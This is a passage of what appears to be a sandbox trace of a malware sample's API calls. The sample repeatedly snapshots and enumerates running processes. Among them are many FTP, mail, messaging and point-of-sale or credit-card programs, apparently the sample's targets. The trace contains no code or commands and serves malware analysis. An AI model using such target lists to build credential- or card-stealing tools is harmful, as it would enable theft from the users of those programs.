dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0241.171] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0241.174] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0241.176] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0241.178] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0241.186] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0241.189] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0241.192] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0241.195] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0241.197] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0241.201] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0241.204] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0241.206] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0241.208] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0241.211] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0241.213] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0241.215] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0241.218] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0241.220] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0241.228] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0241.230] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0241.233] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0241.235] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0241.238] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0241.240] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0241.242] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0241.245] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0241.247] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0241.249] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0241.251] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0241.253] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0241.255] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0241.258] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0241.260] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0241.262] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0241.266] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0241.270] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0241.272] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0241.274] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0241.277] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0241.279] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0241.281] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0241.283] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0241.284] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0241.286] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0241.289] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0241.291] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0241.293] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0241.295] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0241.298] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0241.300] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0241.302] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0241.304] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0241.310] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0241.313] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0241.315] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0241.316] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0241.318] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0241.320] CloseHandle (hObject=0x22d4) returned 1 [0241.320] Sleep (dwMilliseconds=0x64) [0241.441] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2284 [0241.454] Process32First (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.456] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0241.460] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0241.461] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.463] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0241.465] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.468] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0241.470] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0241.472] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0241.474] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.476] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.516] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0241.518] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.521] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.523] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.528] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.530] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.533] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.535] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.538] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0241.541] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0241.543] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.545] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0241.548] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.551] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0241.637] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0241.639] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, 